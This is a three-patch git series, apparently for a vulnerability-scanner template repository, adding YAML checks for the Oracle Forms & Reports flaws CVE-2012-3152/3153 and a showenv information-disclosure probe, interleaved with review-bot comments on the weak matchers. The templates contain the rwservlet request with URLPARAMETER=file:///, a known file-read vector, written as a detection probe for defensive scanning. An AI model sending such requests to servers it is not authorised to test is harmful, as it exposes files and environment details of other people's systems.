From ec835a0bc5ee79d8332e8099e7f386aec293411a Mon Sep 17 00:00:00 2001
From: Sidahmed
Date: Mon, 21 Jun 2021 09:48:42 +0100
Subject: [PATCH 1/3] Create CVE-2012-3152, CVE-2012-3153
---
cves/2012/CVE-2012-3153.yaml | 26 ++++++++++++++++++++++++++
1 file changed, 26 insertions(+)
create mode 100755 cves/2012/CVE-2012-3153.yaml
diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml
new file mode 100755
index 0000000000..b36b3383a9
--- /dev/null
+++ b/cves/2012/CVE-2012-3153.yaml
@@ -0,0 +1,26 @@
+id: CVE-2012-3152,CVE-2012-3153
+
+info:
+ name: Oracle Forms & Reports RCE
+ author: Sid Ahmed MALAOUI @ Realistic Security
+ severity: critical
+ description: |
+ Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
+ 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
+ vectors related to Report Server Component.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
+ - https://www.exploit-db.com/exploits/31737
+ tags: cve,cve2012,oracle,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
+ matchers:
+ - type: word
+ words:
+ - ""
+ - ""
+ part: body
+ negative: true
From b45e0f1206879bf920301ff7a49d44e5b776e512 Mon Sep 17 00:00:00 2001
From: Sidahmed
Date: Mon, 21 Jun 2021 09:49:51 +0100
Subject: [PATCH 2/3] Create "Oracle Forms & Reports Information Disclosure" Vulnerability
---
.../oracle-forms-information-exposure.yaml | 34 +++++++++++++++++++
1 file changed, 34 insertions(+)
create mode 100755 vulnerabilities/oracle/oracle-forms-information-exposure.yaml
diff --git a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml
new file mode 100755
index 0000000000..09bfaf0aa0
--- /dev/null
+++ b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml
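Review bot: The only entry under `matchers:` in the CVE-2012-3153.yaml hunk of 1/3 is a negative `word` match on the body, so nothing positively confirms that the Reports servlet processed the `URLPARAMETER=file:///` request; an error page or an empty body that lacks the listed words would be reported at `severity: critical`. As rendered on this page both `words` entries are empty strings: if the file really contains `""`, a substring test for it holds for every body and the negated matcher can never fire, and the same applies to the two `!contains(body_2, "")` expressions in 3/3, so the literals should be confirmed. I would add `matchers-condition: and` plus a `type: status` matcher for `200` so a finding needs at least a successful response. Separately, `reference:` cites only the NVD entry for CVE-2012-3152 although the file is named for CVE-2012-3153; adding `- https://nvd.nist.gov/vuln/detail/CVE-2012-3153` would cover both.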
@@ -0,0 +1,34 @@
+id: oracle-forms-information-disclosure
+
+info:
+ name: Oracle Forms & Reports Information Disclosure
+ author: Sid Ahmed MALAOUI @ Realistic Security
+ severity: low
+ description: |
+ Disclosing informations about Oracle Forms installation environment.
+ tags: oracle
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/reports/rwservlet/showenv"
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "\\\\.*\\\\showenv"
+ - type: regex
+ part: body
+ regex:
+ - "/.*/showenv"
+ extractors:
+ - type: regex
+ name: windows_working_path
+ part: body
+ regex:
+ - ".?.?\\\\.*\\\\showenv"
+ - type: regex
+ name: linux_path
+ part: body
+ regex:
+ - "/.*/showenv"
From 672acb880e77f185e31eb3f954fdb3163eab384f Mon Sep 17 00:00:00 2001
From: Sidahmed
Date: Tue, 22 Jun 2021 14:52:51 +0100
Subject: [PATCH 3/3] Updated Oracle Forms & Reports CVE-2012-3153
---
cves/2012/CVE-2012-3153.yaml | 38 ++++++++++++++-----
.../oracle-forms-information-exposure.yaml | 34 -----------------
2 files changed, 28 insertions(+), 44 deletions(-)
delete mode 100755 vulnerabilities/oracle/oracle-forms-information-exposure.yaml
diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml
index b36b3383a9..0ab2874518 100755
--- a/cves/2012/CVE-2012-3153.yaml
+++ b/cves/2012/CVE-2012-3153.yaml
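Review bot: The second matcher's pattern `/.*/showenv` is satisfied by the request path `/reports/rwservlet/showenv` itself, so a server that merely echoes the requested URL in an error page would be reported as disclosing its environment. There is no `matchers-condition` and no status check, so either regex alone is enough for a hit. I would fold the two patterns into one `regex` matcher with `condition: or` and require a `200` status alongside it, as sketched below; the same pattern is reused in the second `dsl` matcher and the `linux_working_path` extractor in 3/3. A pattern anchored on text specific to the showenv page would be tighter still, but that text is not visible on this page.

```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        condition: or
        regex:
          - "\\\\.*\\\\showenv"
          - "/.*/showenv"
    # … unchanged: extractors …
```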
@@ -1,12 +1,12 @@ -id: CVE-2012-3152,CVE-2012-3153 +id: CVE-2012-3153 info: - name: Oracle Forms & Reports RCE + name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | - Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, - 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown + Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 @@ -16,11 +16,29 @@ info: requests: - method: GET path: + - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" + req-condition: true + matchers-condition: and matchers: - - type: word - words: - - "" - - "" - part: body - negative: true + - type: dsl + dsl: + - '!contains(body_2, "")' + - '!contains(body_2, "")' + condition: and + - type: dsl + dsl: + - 'regex("\\\\.*\\\\showenv", body_1)' + - 'regex("/.*/showenv", body_1)' + condition: or + extractors: + - type: regex + name: windows_working_path + part: body_1 + regex: + - ".?.?\\\\.*\\\\showenv" + - type: regex + name: linux_working_path + part: body_1 + regex: + - "/.*/showenv" diff --git a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml deleted file mode 100755 index 09bfaf0aa0..0000000000 --- a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml +++ /dev/null 
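Review bot: In the second hunk the first `dsl` matcher is still purely negative evidence for request 2, because it passes whenever `body_2` lacks the two strings, whatever the server actually returned. Under `matchers-condition: and` the critical finding is therefore decided in practice by the `showenv` match on `body_1`, which the template removed in this same patch rated `severity: low`. Adding `'status_code_1 == 200'` and `'status_code_2 == 200'` to that first `dsl` list (its `condition` is already `and`) would at least require both requests to succeed before a host is reported. Ideally request 2 would also get a positive indicator of the fetched content, though the page does not show what that response looks like.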
@@ -1,34 +0,0 @@
-id: oracle-forms-information-disclosure
-
-info:
- name: Oracle Forms & Reports Information Disclosure
- author: Sid Ahmed MALAOUI @ Realistic Security
- severity: low
- description: |
- Disclosing informations about Oracle Forms installation environment.
- tags: oracle
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/reports/rwservlet/showenv"
- matchers:
- - type: regex
- part: body
- regex:
- - "\\\\.*\\\\showenv"
- - type: regex
- part: body
- regex:
- - "/.*/showenv"
- extractors:
- - type: regex
- name: windows_working_path
- part: body
- regex:
- - ".?.?\\\\.*\\\\showenv"
- - type: regex
- name: linux_path
- part: body
- regex:
- - "/.*/showenv"